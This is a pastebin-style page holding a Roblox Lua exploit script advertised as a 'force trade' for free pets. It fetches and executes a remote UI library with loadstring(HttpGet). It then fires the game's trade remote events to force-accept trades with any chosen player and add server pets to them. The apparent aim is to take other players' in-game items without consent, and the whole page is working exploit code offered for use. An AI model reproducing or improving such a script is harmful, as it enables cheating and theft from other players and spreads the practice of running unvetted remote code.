The text below is selected, press Ctrl+C to copy to your clipboard. (⌘+C on Mac) No line numbers will be copied.
Guest
Force Trade Script [Easy Free Pets] script pastebin roblox
By Force Trade Script [Easy Free Pets] on 2024-09-23 08:00 am | Syntax: LUA | Views: 9



New Script | Raw | Show/Hide line no. | Copy text to clipboard
  1.    
  2.    
  3.    
  4.    local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
  5.     local Window = Library.CreateLib("Force Trade By Momo the goat again ;)", "BloodTheme")
  6.    
  7.    
  8.     --main tab
  9.     local main = Window:NewTab("Main")
  10.     local sec = main:NewSection("Force Trade")
  11.     for i , k in pairs(game.Players:GetChildren())do
  12.         sec:NewButton(k.Name, "Person", function()
  13.     --prompt
  14.    
  15.     game:GetService("ReplicatedStorage").GameClient.Events.RemoteEvent.PromptTradeAccept:FireServer(k.Name)
  16.     wait(.2)
  17.     game:GetService("ReplicatedStorage").GameClient.Events.RemoteEvent.DeclineTrade:FireServer(k.Name,"Accept")
  18.     wait(.2)
  19.     --place pets
  20.    
  21.     for i , v in pairs(game:GetService("Workspace").Pets.ServerPets:GetDescendants())do
  22.         if v.Name == "PetName" then
  23.        wait()    
  24.  
  25. game:GetService("ReplicatedStorage").GameClient.Events.RemoteFunction.AddPetToTrade:InvokeServer(k.Name,"Add",{["PetID"] = v.Parent.Name,["PetName"] = v.Value})
  26.        
  27.     end
  28.     end
  29.    
  30.    
  31.    
  32.    
  33.    
  34.    
  35.     wait(.2)
  36.    
  37.     --accepte
  38.     game:GetService("ReplicatedStorage").GameClient.Events.RemoteEvent.AcceptDeclineTrade:FireServer(k.Name,"Accept")
  39.     wait(.5)
  40.     game:GetService("ReplicatedStorage").GameClient.Events.RemoteEvent.AcceptDeclineTrade:FireServer(game.Players.LocalPlayer.Name,"Accept")
  41.     wait(.5)
  42.     end)
  43.         end



  • Recent Roblox Scripts